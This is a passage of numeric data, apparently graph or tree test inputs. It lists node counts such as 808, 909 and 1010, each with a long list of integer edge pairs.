4659,4660],[4660,4661],[4661,4662],[4662,4663],[4663,4664],[4664,4665],[4665,4666],[4666,4667],[4667,4668],[4668,4669],[4669,4670],[4670,4671],[4671,4672],[4672,4673],[4673,4674],[4674,4675],[4675,4676],[4676,4677],[4677,4678],[4678,4679],[4679,4680],[4680,4681],[4681,4682],[4682,4683],[4683,4684],[4684,46
85],[4685,4686],[4686,4687],[4687,4688],[4688,4689],[4689,4690],[4690,4691],[4691,4692],[4692,4693],[4693,4694],[4694,4695],[4695,4696],[4696,4697],[4697,4698],[4698,4699],[4699,4700],[4700,4701],[4701,4702],[4702,4703],[4703,4704],[4704,4705],[4705,4706],[4706,4707],[4707,4708],[4708,4709],[4709,4710],[4710,4711],[4711,4712],[4712,4713],[4713,4714],[4714,4715],[4715,4716],[4716,4717],[4717,4718],[4718,4719],[4719,4720],[4720,4721],[4721,4722],[4722,4723],[4723,4724],[4724,4725],[4725,4726],[4726,4727],[4727,4728],[4728,4729],[4729,4730],[4730,4731],[4731,4732],[4732,4733],[4733,4734],[4734,4735],[4735,4736],[4736,4737],[4737,4738],[4738,4739],[4739,4740],[4740,4741],[4741,4742],[4742,4743],[4743,4744],[4744,4745],[4745,4746],[4746,4747],[4747,4748],[4748,4749],[4749,4750],[4750,4751],[4751,4752],[4752,4753],[4753,4754],[4754,4755],[4755,4756],[4756,4757],[4757,4758],[4758,4759],[4759,4760],[4760,4761],[4761,4762],[4762,4763],[4763,4764],[4764,4765],[4765,4766],[4766,4767],[4767,4768],[4768,4769],[4769,4770],[4770,4771],[4771,4772],[4772,4773],[4773,4774],[4774,4775],[4775,4776],[4776,4777],[4777,4778],[4778,4779],[4779,4780],[4780,4781],[4781,4782],[4782,4783],[4783,4784],[4784,4785],[4785,4786],[4786,4787],[4787,4788],[4788,4789],[4789,4790],[4790,4791],[4791,4792],[4792,4793],[4793,4794],[4794,4795],[4795,4796],[4796,4797],[4797,4798],[4798,4799],[4799,4800],[4800,4801],[4801,4802],[4802,4803],[4803,4804],[4804,4805],[4805,4806],[4806,4807],[4807,4808],[4808,4809],[4809,4810],[4810,4811],[4811,4812],[4812,4813],[4813,4814],[4814,4815],[4815,4816],[4816,4817],[4817,4818],[4818,4819],[4819,4820],[4820,4821],[4821,4822],[4822,4823],[4823,4824],[4824,4825],[4825,4826],[4826,4827],[4827,4828],[4828,4829],[4829,4830],[4830,4831],[4831,4832],[4832,4833],[4833,4834],[4834,4835],[4835,4836],[4836,4837],[4837,4838],[4838,4839],[4839,4840],[4840,4841],[4841,4842],[4842,4843],[4843,4844],[4844,4845],[4845,4846],[4846,4847],[4847,4848],[4848,4849],[4849,4850],[4850,4851],[485
1,4852],[4852,4853],[4853,4854],[4854,4855],[4855,4856],[4856,4857],[4857,4858],[4858,4859],[4859,4860],[4860,4861],[4861,4862],[4862,4863],[4863,4864],[4864,4865],[4865,4866],[4866,4867],[4867,4868],[4868,4869],[4869,4870],[4870,4871],[4871,4872],[4872,4873],[4873,4874],[4874,4875],[4875,4876],[4876,4877],[4877,4878],[4878,4879],[4879,4880],[4880,4881],[4881,4882],[4882,4883],[4883,4884],[4884,4885],[4885,4886],[4886,4887],[4887,4888],[4888,4889],[4889,4890],[4890,4891],[4891,4892],[4892,4893],[4893,4894],[4894,4895],[4895,4896],[4896,4897],[4897,4898],[4898,4899],[4899,4900],[4900,4901],[4901,4902],[4902,4903],[4903,4904],[4904,4905],[4905,4906],[4906,4907],[4907,4908],[4908,4909],[4909,4910],[4910,4911],[4911,4912],[4912,4913],[4913,4914],[4914,4915],[4915,4916],[4916,4917],[4917,4918],[4918,4919],[4919,4920],[4920,4921],[4921,4922],[4922,4923],[4923,4924],[4924,4925],[4925,4926],[4926,4927],[4927,4928],[4928,4929],[4929,4930],[4930,4931],[4931,4932],[4932,4933],[4933,4934],[4934,4935],[4935,4936],[4936,4937],[4937,4938],[4938,4939],[4939,4940],[4940,4941],[4941,4942],[4942,4943],[4943,4944],[4944,4945],[4945,4946],[4946,4947],[4947,4948],[4948,4949],[4949,4950],[4950,4951],[4951,4952],[4952,4953],[4953,4954],[4954,4955],[4955,4956],[4956,4957],[4957,4958],[4958,4959],[4959,4960],[4960,4961],[4961,4962],[4962,4963],[4963,4964],[4964,4965],[4965,4966],[4966,4967],[4967,4968],[4968,4969],[4969,4970],[4970,4971],[4971,4972],[4972,4973],[4973,4974],[4974,4975],[4975,4976],[4976,4977],[4977,4978],[4978,4979],[4979,4980],[4980,4981],[4981,4982],[4982,4983],[4983,4984],[4984,4985],[4985,4986],[4986,4987],[4987,4988],[4988,4989],[4989,4990],[4990,4991],[4991,4992],[4992,4993],[4993,4994],[4994,4995],[4995,4996],[4996,4997],[4997,4998],[4998,4999]]
),
(808,
[[0, 1], [1, 2], [0, 3], [2, 4], [1, 5], [2, 6], [3, 7], [1, 8], [4, 9],
[1, 10], [3, 11], [8, 12], [7, 13], [8, 14], [0, 15], [1, 16], [6, 17],
[9, 18], [17, 19], [15, 20], [10, 21], [16, 22], [0, 23], [6, 24], [
2, 25
], [2, 26], [0, 27], [2, 28], [19, 29], [13, 30], [18, 31], [12, 32],
[5, 33], [5, 34], [1, 35], [20, 36], [19, 37], [15, 38], [6, 39], [
9, 40
], [10, 41], [1, 42], [35, 43], [1, 44], [42, 45], [27, 46], [11, 47],
[41, 48], [41, 49], [2, 50], [28, 51], [22, 52], [2, 53], [15, 54],
[26, 55], [0, 56], [35, 57], [3, 58], [17, 59], [52, 60], [0, 61], [
61, 62
], [56, 63], [16, 64], [5, 65], [7, 66], [6, 67], [9, 68], [53, 69],
[20, 70], [11, 71], [41, 72], [33, 73], [35, 74], [27, 75], [46, 76],
[15, 77], [19, 78], [26, 79], [32, 80], [29, 81], [15, 82], [55, 83],
[77, 84], [25, 85], [50, 86], [19, 87], [63, 88], [63, 89], [28, 90],
[16, 91], [52, 92], [78, 93], [13, 94], [74, 95], [95, 96], [64, 97], [
41, 98
], [6, 99], [59, 100], [23, 101], [30, 102], [50, 103], [56, 104], [
59, 105
], [22, 106], [67, 107], [94, 108], [92, 109], [41, 110], [58, 111], [
70, 112
], [47, 113], [65, 114], [94, 115], [60, 116], [2, 117], [12, 118], [
96, 119
], [103, 120], [88, 121], [40, 122], [34, 123], [1, 124], [35, 125], [
6, 126
], [22, 127], [24, 128], [116, 129], [25, 130], [56, 131], [29, 132], [
41, 133
], [108, 134], [74, 135], [74, 136], [130, 137], [1, 138], [37, 139], [
14, 140
], [130, 141], [47, 142], [101, 143], [1, 144], [28, 145], [114, 146],
[16, 147], [13, 148], [44, 149], [145, 150], [124, 151], [84, 152], [
119, 153
], [56, 154], [84, 155], [144, 156], [14, 157], [88, 158], [155, 159],
[125, 160], [130, 161], [87, 162], [74, 163], [45, 164], [7, 165], [
34, 166
], [31, 167], [123, 168], [8, 169], [137, 170], [39, 171], [157, 172],
[32, 173], [55, 174], [90, 175], [99, 176], [145, 177], [83, 178],
[1, 179], [57, 180], [151, 181], [115, 182], [159, 183], [99, 184],
[127, 185], [90, 186], [136, 187], [148, 188], [163, 189], [19, 190], [
162, 191
], [73, 192], [32, 193], [157, 194], [68, 195], [91, 196], [90, 197],
[12, 198], [124, 199], [199, 200], [86, 201],
[39, 202], [153, 203], [91, 204], [87, 205], [59, 206], [3, 207], [
114, 208
], [190, 209], [135, 210], [76, 211], [26, 212], [185, 213], [
143, 214
], [138, 215], [14, 216], [94, 217], [202, 218], [199, 219], [
110, 220
], [163, 221], [47, 222], [144, 223], [163, 224], [141, 225], [
158, 226
], [58, 227], [76, 228], [212, 229], [29, 230], [15, 231], [67, 232], [
217, 233
], [108, 234], [218, 235], [202, 236], [231, 237], [171, 238], [
99, 239
], [177, 240], [240, 241], [218, 242], [214, 243], [20, 244], [
124, 245
], [83, 246], [142, 247], [58, 248], [126, 249], [121, 250], [
151, 251
], [150, 252], [83, 253], [223, 254], [69, 255], [34, 256], [191, 257],
[172, 258], [78, 259], [3, 260], [27, 261], [196, 262], [192, 263], [
9, 264
], [41, 265], [83, 266], [37, 267], [43, 268], [242, 269], [33, 270], [
219, 271
], [67, 272], [72, 273], [111, 274], [77, 275], [10, 276], [27, 277], [
175, 278
], [192, 279], [188, 280], [276, 281], [139, 282], [118, 283], [
119, 284
], [197, 285], [151, 286], [45, 287], [273, 288], [101, 289], [
94, 290
], [247, 291], [265, 292], [235, 293], [247, 294], [11, 295], [
182, 296
], [221, 297], [171, 298], [149, 299], [225, 300], [299, 301], [
236, 302
], [134, 303], [286, 304], [235, 305], [74, 306], [290, 307], [
117, 308
], [167, 309], [92, 310], [139, 311], [302, 312], [69, 313], [
239, 314
], [51, 315], [265, 316], [55, 317], [165, 318], [219, 319], [
174, 320
], [117, 321], [307, 322], [288, 323], [142, 324], [161, 325], [
198, 326
], [235, 327], [143, 328], [113, 329], [66, 330], [236, 331], [
129, 332
], [222, 333], [320, 334], [36, 335], [229, 336], [248, 337], [
303, 338
], [330, 339], [288, 340], [244, 341], [336, 342], [105, 343], [
157, 344
], [156, 345], [312, 346], [40, 347], [209, 348], [19, 349], [
155, 350
], [50, 351], [264, 352], [55, 353], [295, 354], [301, 355], [
153, 356
], [135, 357], [123, 358], [235, 359], [318, 360], [320, 361], [
3, 362
], [28, 363], [30, 364], [209, 365], [1, 366], [210, 367], [188, 368],
[33, 369], [24, 370], [367, 371], [296, 372], [62, 373], [371, 374], [
130, 375
], [126, 376], [357, 377], [108, 378], [269, 379], [47, 380], [
47, 381
], [127, 382], [327, 383], [324, 384], [224, 385], [96, 386], [
361, 387
], [143, 388], [228, 389], [263, 390], [17, 391], [225, 392], [
181, 393
], [327, 394], [46, 395], [382, 396], [371, 397], [162, 398], [
355, 399
], [358, 400], [149, 401], [241, 402], [58, 403], [317, 404], [
10, 405
], [129, 406], [10, 407], [139, 408], [269, 409], [96, 410], [
338, 411
], [310, 412], [352, 413], [359, 414], [301, 415], [7, 416], [
388, 417
], [311, 418], [387, 419], [375, 420], [411, 421], [175, 422], [
162, 423
], [402, 424], [326, 425], [226, 426], [232, 427], [301, 428], [
136, 429
], [347, 430], [38, 431], [9, 432], [54, 433], [130, 434], [
178, 435
], [289, 436], [125, 437], [374, 438], [312, 439], [322, 440], [
214, 441
], [348, 442], [91, 443], [327, 444], [266, 445], [102, 446], [
371, 447
], [307, 448], [200, 449], [359, 450], [176, 451], [217, 452], [
200, 453
], [431, 454], [117, 455], [231, 456], [250, 457], [100, 458], [
196, 459
], [260, 460], [272, 461], [386, 462], [15, 463], [8, 464], [
108, 465
], [456, 466], [465, 467], [367, 468], [118, 469], [370, 470], [
152, 471
], [293, 472], [416, 473], [197, 474], [431, 475], [469, 476], [
150, 477
], [424, 478], [233, 479], [173, 480], [431, 481], [358, 482], [
377, 483
], [198, 484], [189, 485], [259, 486], [461, 487], [210, 488], [
307, 489
], [188, 490], [422, 491], [454, 492], [171, 493], [21, 494], [
198, 495
], [231, 496], [343, 497], [284, 498], [448, 499], [205, 500], [
263, 501
], [472, 502], [43, 503], [306, 504], [364, 505], [134, 506], [
36, 507
], [61, 508], [500, 509], [389, 510], [348, 511], [488, 512], [
212, 513
], [57, 514], [216, 515], [514, 516], [114, 517], [227, 518], [
227, 519
], [313, 520], [436, 521], [323, 522], [515, 523], [280, 524], [
162, 525
], [502, 526], [178, 527], [490, 528], [109, 529], [198, 530], [
288, 531
], [191, 532], [448, 533], [218, 534], [129, 535], [499, 536], [
106, 537
], [499, 538], [287, 539], [54, 540], [416, 541], [206, 542], [
83, 543
], [348, 544], [370, 545], [357, 546], [380, 547], [308, 548], [
256, 549
], [202, 550], [308, 551], [126, 552], [469, 553], [302, 554], [
308, 555
], [78, 556], [83, 557], [147, 558], [140, 559], [85, 560], [
438, 561
], [268, 562], [301, 563], [234, 564], [547, 565], [152, 566], [
565, 567
], [134, 568], [235, 569], [212, 570], [372, 571], [377, 572], [
286, 573
], [165, 574], [259, 575], [345, 576], [527, 577], [168, 578], [
534, 579
], [509, 580], [512, 581], [375, 582], [21, 583], [287, 584], [
331, 585
], [77, 586], [131, 587], [443, 588], [3, 589], [77, 590], [34, 591], [
428, 592
], [458, 593], [396, 594], [238, 595], [522, 596], [28, 597], [
353, 598
], [497, 599], [318, 600], [465, 601], [270, 602], [256, 603], [
389, 604
], [307, 605], [536, 606], [92, 607], [243, 608], [58, 609], [
86, 610
], [308, 611], [301, 612], [333, 613], [514, 614], [459, 615], [
151, 616
], [377, 617], [338, 618], [246, 619], [199, 620], [351, 621], [
252, 622
], [285, 623], [611, 624], [543, 625], [198, 626], [407, 627], [
210, 628
], [393, 629], [211, 630], [111, 631], [326, 632], [347, 633], [
100, 634
], [206, 635], [183, 636], [318, 637], [266, 638], [243, 639], [
208, 640
], [551, 641], [490, 642], [458, 643], [178, 644], [505, 645], [
302, 646
], [11, 647], [329, 648], [149, 649], [608, 650], [153, 651], [
223, 652
], [604, 653], [572, 654], [604, 655], [542, 656], [541, 657], [
438, 658
], [104, 659], [490, 660], [38, 661], [212, 662], [161, 663], [
572, 664
], [553, 665], [640, 666], [31, 667], [66, 668], [113, 669], [
142, 670
], [19, 671], [370, 672], [542, 673], [43, 674], [532, 675], [
507, 676
], [52, 677], [389, 678], [449, 679], [475, 680], [98, 681], [
224, 682
], [85, 683], [351, 684], [209, 685], [242, 686], [646, 687], [
209, 688
], [225, 689], [457, 690], [325, 691], [68, 692], [505, 693], [
222, 694
], [197, 695], [227, 696], [296, 697], [567, 698], [473, 699], [
231, 700
], [595, 701], [448, 702], [261, 703], [479, 704], [357, 705], [
555, 706
], [358, 707], [570, 708], [350, 709], [321, 710], [174, 711], [
448, 712
], [337, 713], [618, 714], [415, 715], [222, 716], [140, 717], [
550, 718
], [629, 719], [640, 720], [245, 721], [249, 722], [336, 723], [
429, 724
], [43, 725], [207, 726], [419, 727], [694, 728], [136, 729], [
464, 730
], [130, 731], [681, 732], [395, 733], [572, 734], [425, 735], [
154, 736
], [539, 737], [345, 738], [386, 739], [55, 740], [192, 741], [
497, 742
], [674, 743], [723, 744], [131, 745], [244, 746], [42, 747], [
125, 748
], [136, 749], [298, 750], [152, 751], [15, 752], [157, 753], [
667, 754
], [511, 755], [479, 756], [86, 757], [47, 758], [580, 759], [
475, 760
], [632, 761], [259, 762], [400, 763], [93, 764], [301, 765], [
445, 766
], [405, 767], [294, 768], [281, 769], [25, 770], [199, 771], [
403, 772
], [731, 773], [119, 774], [87, 775], [394, 776], [547, 777], [
47, 778
], [717, 779], [779, 780], [522, 781], [231, 782], [212, 783], [
163, 784
], [581, 785], [224, 786], [536, 787], [762, 788], [211, 789], [
169, 790
], [215, 791], [749, 792], [757, 793], [152, 794], [505, 795], [
379, 796
], [691, 797], [638, 798], [376, 799], [41, 800], [109, 801], [
711, 802
], [649, 803], [514, 804], [616, 805], [46, 806], [538, 807]]
),
(909,
[[0,1],[0,2],[2,3],[0,4],[4,5],[0,6],[6,7],[0,8],[7,9],[1,10],[0,11],[10,12],[8,13],[3,14],[1,15],[1,16],[4,17],[7,18],[15,19],[1,20],[14,21],[9,22],[14,23],[15,24],[7,25],[0,26],[24,27],[13,28],[22,29],[18,30],[18,31],[17,32],[14,33],[20,34],[1,35],[14,36],[14,37],[30,38],[13,39],[6,40],[32,41],[17,42],[23,43],[23,44],[6,45],[27,46],[9,47],[4,48],[16,49],[31,50],[21,51],[21,52],[31,53],[53,54],[18,55],[3,56],[7,57],[52,58],[14,59],[10,60],[20,61],[17,62],[2,63],[36,64],[25,65],[53,66],[61,67],[23,68],[14,69],[29,70],[63,71],[12,72],[6,73],[11,74],[73,75],[60,76],[38,77],[61,78],[71,79],[20,80],[24,81],[60,82],[52,83],[68,84],[22,85],[36,86],[85,87],[9,88],[15,89],[56,90],[16,91],[67,92],[24,93],[63,94],[41,95],[57,96],[83,97],[90,98],[38,99],[54,100],[97,101],[4,102],[51,103],[31,104],[22,105],[102,106],[95,107],[71,108],[9,109],[53,110],[62,111],[110,112],[5,113],[27,114],[104,115],[35,116],[14,117],[0,118],[106,119],[37,120],[8,121],[26,122],[87,123],[49,124],[74,125],[61,126],[17,127],[89,128],[58,129],[33,130],[36,131],[50,132],[43,133],[121,134],[32,135],[113,136],[64,137],[73,138],[13,139],[133,140],[89,141],[36,142],[86,143],[117,144],[11,145],[70,146],[98,147],[82,148],[28,149],[61,150],[66,151],[59,152],[51,153],[49,154],[61,155],[76,156],[155,157],[57,158],[112,159],[19,160],[60,161],[88,162],[62,163],[52,164],[126,165],[48,166],[47,167],[136,168],[15,169],[7,170],[85,171],[61,172],[110,173],[81,174],[135,175],[60,176],[95,177],[171,178],[161,179],[44,180],[19,181],[175,182],[107,183],[23,184],[66,185],[122,186],[128,187],[147,188],[139,189],[135,190],[19,191],[103,192],[51,193],[158,194],[99,195],[75,196],[4,197],[26,198],[131,199],[167,200],[83,201],[131,202],[55,203],[32,204],[164,205],[98,206],[86,207],[170,208],[170,209],[188,210],[40,211],[46,212],[31,213],[18,214],[116,215],[13,216],[212,217],[148,218],[88,219],[19,220],[81,221],[137,222],[23,223],[58,224],[163,225],[145,226],[116,227],[45,228],[31,229],[47,230],[66,231],[82,232],[59,233],[229,234]
,[164,235],[122,236],[31,237],[143,238],[178,239],[32,240],[97,241],[89,242],[117,243],[191,244],[76,245],[25,246],[217,247],[106,248],[37,249],[12,250],[47,251],[163,252],[247,253],[253,254],[19,255],[245,256],[67,257],[108,258],[50,259],[115,260],[67,261],[248,262],[148,263],[149,264],[220,265],[54,266],[134,267],[2,268],[161,269],[265,270],[31,271],[83,272],[162,273],[267,274],[21,275],[72,276],[26,277],[112,278],[268,279],[41,280],[84,281],[196,282],[281,283],[109,284],[118,285],[66,286],[167,287],[142,288],[154,289],[262,290],[158,291],[216,292],[26,293],[30,294],[60,295],[276,296],[72,297],[215,298],[7,299],[69,300],[289,301],[54,302],[210,303],[280,304],[204,305],[186,306],[217,307],[305,308],[225,309],[13,310],[3,311],[110,312],[82,313],[155,314],[22,315],[66,316],[223,317],[252,318],[229,319],[247,320],[231,321],[190,322],[308,323],[26,324],[245,325],[123,326],[91,327],[308,328],[17,329],[78,330],[136,331],[7,332],[146,333],[318,334],[273,335],[161,336],[35,337],[241,338],[282,339],[133,340],[136,341],[8,342],[146,343],[117,344],[15,345],[102,346],[52,347],[21,348],[166,349],[131,350],[178,351],[142,352],[7,353],[255,354],[346,355],[162,356],[16,357],[253,358],[285,359],[23,360],[7,361],[96,362],[128,363],[231,364],[223,365],[275,366],[347,367],[244,368],[203,369],[55,370],[182,371],[170,372],[270,373],[315,374],[85,375],[346,376],[212,377],[102,378],[319,379],[252,380],[264,381],[351,382],[164,383],[233,384],[361,385],[175,386],[230,387],[331,388],[57,389],[119,390],[118,391],[251,392],[306,393],[255,394],[199,395],[238,396],[17,397],[197,398],[151,399],[356,400],[395,401],[191,402],[16,403],[13,404],[110,405],[313,406],[340,407],[161,408],[301,409],[44,410],[364,411],[272,412],[100,413],[312,414],[307,415],[347,416],[374,417],[187,418],[328,419],[118,420],[311,421],[321,422],[108,423],[395,424],[190,425],[299,426],[79,427],[68,428],[240,429],[386,430],[371,431],[5,432],[255,433],[320,434],[376,435],[81,436],[68,437],[54,438],[421,439],[423,440],[311,441],
[41,442],[3,443],[400,444],[137,445],[253,446],[335,447],[376,448],[1,449],[212,450],[169,451],[383,452],[401,453],[383,454],[54,455],[59,456],[35,457],[121,458],[173,459],[388,460],[456,461],[81,462],[368,463],[219,464],[178,465],[114,466],[384,467],[104,468],[268,469],[170,470],[246,471],[319,472],[258,473],[326,474],[241,475],[25,476],[468,477],[444,478],[418,479],[405,480],[261,481],[447,482],[140,483],[30,484],[375,485],[75,486],[455,487],[64,488],[236,489],[454,490],[207,491],[431,492],[290,493],[84,494],[409,495],[315,496],[343,497],[480,498],[451,499],[155,500],[262,501],[111,502],[441,503],[237,504],[387,505],[275,506],[75,507],[259,508],[465,509],[433,510],[217,511],[450,512],[30,513],[479,514],[179,515],[102,516],[181,517],[153,518],[208,519],[380,520],[256,521],[276,522],[253,523],[417,524],[179,525],[305,526],[450,527],[407,528],[442,529],[99,530],[381,531],[89,532],[507,533],[347,534],[132,535],[445,536],[197,537],[255,538],[479,539],[322,540],[277,541],[342,542],[44,543],[443,544],[322,545],[96,546],[397,547],[195,548],[316,549],[13,550],[397,551],[405,552],[250,553],[365,554],[108,555],[213,556],[97,557],[406,558],[156,559],[421,560],[80,561],[328,562],[303,563],[243,564],[269,565],[485,566],[457,567],[371,568],[201,569],[337,570],[183,571],[221,572],[113,573],[447,574],[244,575],[429,576],[126,577],[69,578],[535,579],[303,580],[283,581],[567,582],[209,583],[21,584],[227,585],[21,586],[16,587],[268,588],[45,589],[107,590],[141,591],[40,592],[157,593],[328,594],[68,595],[225,596],[219,597],[301,598],[44,599],[515,600],[334,601],[229,602],[95,603],[177,604],[408,605],[119,606],[200,607],[334,608],[142,609],[437,610],[391,611],[272,612],[231,613],[566,614],[64,615],[186,616],[584,617],[9,618],[369,619],[21,620],[477,621],[17,622],[604,623],[228,624],[225,625],[615,626],[403,627],[90,628],[459,629],[171,630],[52,631],[626,632],[385,633],[96,634],[120,635],[161,636],[86,637],[14,638],[302,639],[402,640],[191,641],[355,642],[475,643],[267,644],[616,645],[1
0,646],[595,647],[295,648],[332,649],[78,650],[334,651],[402,652],[215,653],[328,654],[383,655],[461,656],[608,657],[590,658],[427,659],[115,660],[301,661],[579,662],[361,663],[602,664],[215,665],[181,666],[292,667],[126,668],[160,669],[640,670],[559,671],[301,672],[221,673],[226,674],[430,675],[403,676],[484,677],[395,678],[659,679],[169,680],[627,681],[48,682],[421,683],[589,684],[100,685],[662,686],[244,687],[440,688],[623,689],[626,690],[46,691],[148,692],[688,693],[87,694],[635,695],[609,696],[186,697],[317,698],[654,699],[412,700],[291,701],[481,702],[639,703],[596,704],[40,705],[382,706],[222,707],[445,708],[409,709],[612,710],[214,711],[658,712],[363,713],[399,714],[335,715],[274,716],[21,717],[109,718],[232,719],[551,720],[113,721],[78,722],[20,723],[172,724],[192,725],[291,726],[47,727],[378,728],[372,729],[349,730],[696,731],[362,732],[509,733],[603,734],[481,735],[633,736],[709,737],[610,738],[671,739],[525,740],[176,741],[329,742],[451,743],[23,744],[190,745],[473,746],[234,747],[470,748],[160,749],[599,750],[50,751],[176,752],[69,753],[525,754],[97,755],[692,756],[117,757],[364,758],[627,759],[393,760],[415,761],[222,762],[737,763],[461,764],[392,765],[28,766],[663,767],[274,768],[673,769],[607,770],[160,771],[222,772],[605,773],[342,774],[418,775],[269,776],[371,777],[235,778],[299,779],[725,780],[297,781],[233,782],[260,783],[214,784],[247,785],[170,786],[517,787],[612,788],[246,789],[52,790],[173,791],[490,792],[297,793],[451,794],[309,795],[65,796],[352,797],[178,798],[403,799],[338,800],[342,801],[282,802],[317,803],[361,804],[479,805],[141,806],[280,807],[303,808],[265,809],[172,810],[42,811],[39,812],[133,813],[339,814],[744,815],[765,816],[165,817],[323,818],[238,819],[95,820],[76,821],[37,822],[283,823],[410,824],[464,825],[666,826],[23,827],[669,828],[77,829],[512,830],[739,831],[813,832],[342,833],[18,834],[354,835],[641,836],[318,837],[480,838],[287,839],[521,840],[29,841],[224,842],[9,843],[119,844],[47,845],[291,846],[239,847],[249,848],[
448,849],[347,850],[380,851],[354,852],[473,853],[55,854],[413,855],[635,856],[350,857],[454,858],[80,859],[550,860],[361,861],[660,862],[427,863],[535,864],[317,865],[162,866],[427,867],[732,868],[4,869],[611,870],[771,871],[311,872],[600,873],[809,874],[634,875],[618,876],[123,877],[373,878],[600,879],[686,880],[610,881],[361,882],[108,883],[397,884],[766,885],[440,886],[434,887],[627,888],[263,889],[316,890],[651,891],[668,892],[119,893],[696,894],[624,895],[133,896],[228,897],[71,898],[162,899],[496,900],[749,901],[802,902],[471,903],[117,904],[84,905],[212,906],[42,907],[351,908]]
),
(
1010,
[[0,1],[0,2],[1,3],[0,4],[0,5],[1,6],[1,7],[5,8],[7,9],[6,10],[5,11],[9,12],[7,13],[7,14],[13,15],[15,16],[4,17],[3,18],[16,19],[0,20],[18,21],[15,22],[9,23],[14,24],[19,25],[1,26],[24,27],[25,28],[22,29],[2,30],[15,31],[11,32],[27,33],[9,34],[30,35],[6,36],[20,37],[8,38],[15,39],[23,40],[7,41],[20,42],[6,43],[9,44],[14,45],[13,46],[35,47],[36,48],[27,49],[7,50],[48,51],[8,52],[25,53],[50,54],[34,55],[32,56],[16,57],[17,58],[53,59],[12,60],[28,61],[4,62],[20,63],[49,64],[7,65],[4,66],[64,67],[24,68],[47,69],[1,70],[56,71],[33,72],[71,73],[56,74],[62,75],[18,76],[58,77],[12,78],[2,79],[15,80],[74,81],[31,82],[73,83],[6,84],[48,85],[13,86],[67,87],[72,88],[78,89],[44,90],[72,91],[87,92],[48,93],[68,94],[76,95],[41,96],[30,97],[18,98],[56,99],[16,100],[55,101],[47,102],[8,103],[11,104],[93,105],[88,106],[3,107],[44,108],[18,109],[48,110],[14,111],[94,112],[109,113],[5,114],[59,115],[47,116],[26,117],[83,118],[75,119],[80,120],[72,121],[78,122],[107,123],[122,124],[1,125],[40,126],[68,127],[5,128],[90,129],[14,130],[12,131],[40,132],[57,133],[1,134],[85,135],[23,136],[97,137],[20,138],[10,139],[40,140],[6,141],[135,142],[112,143],[38,144],[70,145],[86,146],[100,147],[103,148],[40,149],[110,150],[35,151],[142,152],[86,153],[102,154],[97,155],[53,156],[86,157],[16,158],[49,159],[101,160],[122,161],[28,162],[107,163],[28,164],[9,165],[45,166],[98,167],[83,168],[63,169],[46,170],[49,171],[154,172],[111,173],[79,174],[37,175],[42,176],[38,177],[107,178],[95,179],[90,180],[78,181],[66,182],[88,183],[93,184],[162,185],[156,186],[83,187],[43,188],[125,189],[16,190],[107,191],[138,192],[164,193],[75,194],[108,195],[30,196],[45,197],[92,198],[160,199],[138,200],[68,201],[94,202],[135,203],[102,204],[24,205],[50,206],[7,207],[142,208],[123,209],[78,210],[62,211],[3,212],[42,213],[63,214],[60,215],[113,216],[210,217],[180,218],[91,219],[77,220],[164,221],[178,222],[39,223],[218,224],[203,225],[12,226],[209,227],[172,228],[156,229],[42,230],[194,231],[40,232],[95,233],[131,234],[39,
235],[135,236],[37,237],[61,238],[186,239],[134,240],[41,241],[206,242],[144,243],[15,244],[138,245],[191,246],[82,247],[174,248],[84,249],[28,250],[44,251],[171,252],[168,253],[112,254],[191,255],[132,256],[146,257],[30,258],[163,259],[178,260],[131,261],[80,262],[23,263],[202,264],[160,265],[203,266],[261,267],[254,268],[226,269],[97,270],[132,271],[6,272],[209,273],[18,274],[175,275],[165,276],[72,277],[234,278],[145,279],[233,280],[180,281],[216,282],[176,283],[160,284],[28,285],[21,286],[24,287],[264,288],[129,289],[118,290],[188,291],[209,292],[50,293],[266,294],[115,295],[122,296],[254,297],[171,298],[233,299],[143,300],[238,301],[88,302],[157,303],[98,304],[60,305],[275,306],[99,307],[150,308],[238,309],[155,310],[53,311],[212,312],[9,313],[163,314],[155,315],[285,316],[232,317],[155,318],[285,319],[141,320],[89,321],[246,322],[93,323],[173,324],[125,325],[17,326],[290,327],[94,328],[324,329],[94,330],[179,331],[101,332],[292,333],[229,334],[190,335],[111,336],[149,337],[292,338],[325,339],[26,340],[9,341],[236,342],[105,343],[133,344],[121,345],[143,346],[177,347],[285,348],[174,349],[290,350],[16,351],[302,352],[250,353],[95,354],[339,355],[10,356],[274,357],[156,358],[334,359],[113,360],[108,361],[177,362],[326,363],[229,364],[73,365],[118,366],[113,367],[336,368],[224,369],[174,370],[39,371],[356,372],[189,373],[280,374],[154,375],[359,376],[78,377],[175,378],[261,379],[185,380],[208,381],[211,382],[265,383],[60,384],[271,385],[304,386],[77,387],[171,388],[234,389],[343,390],[47,391],[367,392],[307,393],[25,394],[371,395],[38,396],[281,397],[308,398],[209,399],[9,400],[133,401],[234,402],[37,403],[237,404],[357,405],[62,406],[153,407],[254,408],[17,409],[388,410],[410,411],[401,412],[109,413],[107,414],[362,415],[300,416],[27,417],[106,418],[324,419],[165,420],[26,421],[330,422],[94,423],[172,424],[230,425],[64,426],[10,427],[93,428],[288,429],[253,430],[224,431],[430,432],[394,433],[356,434],[260,435],[121,436],[253,437],[369,438],[195,439],[30,440],[35
6,441],[381,442],[381,443],[61,444],[336,445],[164,446],[358,447],[115,448],[219,449],[434,450],[80,451],[108,452],[446,453],[188,454],[447,455],[260,456],[39,457],[31,458],[67,459],[218,460],[213,461],[450,462],[451,463],[259,464],[153,465],[103,466],[157,467],[151,468],[187,469],[73,470],[69,471],[60,472],[359,473],[469,474],[324,475],[460,476],[77,477],[167,478],[351,479],[196,480],[14,481],[326,482],[152,483],[455,484],[309,485],[45,486],[2,487],[403,488],[96,489],[433,490],[356,491],[449,492],[302,493],[466,494],[293,495],[428,496],[456,497],[108,498],[481,499],[352,500],[260,501],[322,502],[193,503],[354,504],[257,505],[278,506],[362,507],[311,508],[139,509],[138,510],[299,511],[307,512],[37,513],[175,514],[197,515],[135,516],[12,517],[49,518],[337,519],[86,520],[460,521],[232,522],[99,523],[253,524],[130,525],[514,526],[457,527],[30,528],[216,529],[73,530],[404,531],[284,532],[82,533],[440,534],[492,535],[206,536],[30,537],[21,538],[43,539],[429,540],[395,541],[507,542],[464,543],[52,544],[395,545],[339,546],[65,547],[423,548],[2,549],[190,550],[116,551],[288,552],[262,553],[155,554],[526,555],[279,556],[247,557],[129,558],[66,559],[43,560],[355,561],[415,562],[21,563],[142,564],[523,565],[135,566],[306,567],[154,568],[194,569],[461,570],[439,571],[63,572],[434,573],[29,574],[486,575],[571,576],[470,577],[366,578],[327,579],[40,580],[100,581],[310,582],[251,583],[229,584],[294,585],[108,586],[30,587],[110,588],[199,589],[487,590],[528,591],[249,592],[